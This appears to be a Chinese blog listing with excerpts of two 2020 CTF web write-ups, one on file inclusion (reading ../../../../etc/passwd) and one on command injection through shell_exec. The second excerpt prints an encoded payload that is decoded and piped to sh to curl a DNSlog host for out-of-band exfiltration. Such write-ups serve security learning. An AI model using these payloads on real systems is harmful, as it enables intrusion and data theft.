CTF
Bcdlbgm
在山西 还在上学。
展开
-
ISCC-2020-WEB-What can images do-writep
WEBWhat can images do(文件包含+文件上传)其实序列号也做出来了,没有立马写后来就忘了。当时立马写wp的只有这个一个。题目:http://101.201.126.95:7004/可以看到有个filename,参数是文件名。可以试试包含../../../../etc/passwd成功但是不知道后台是include还是file_get_content。(这两者是有区别的可以参考这里,(链接11))然后我们再尝试一下php文件,可以看到包含了。那么就是include。然原创 2020-05-31 21:13:17 · 342 阅读 · 0 评论 -
2020年DASCTF五月线上赛-WEB-小红花
小红花很明显是命令执行,但肯定有过滤.首先看函数shell_exec他会执行系统命令,并把执行结果返回出来。但看提示似乎没有把返回结果打印测试后也证实了这个想法。那么就首先尝试外带了。dnslog外带-失败尝试过以后payload都没有成功。听别人说之前有人成功过是因为非预期后来再进行尝试就没有成功了。echo Y3VybCBibC50ZXN0LmRuc2xvZy5saW5rIA==|base64 -d |shecho MN2XE3BAMJWC45DFON2C4ZDOONWG6ZZONRUW原创 2020-05-24 19:42:35 · 1218 阅读 · 0 评论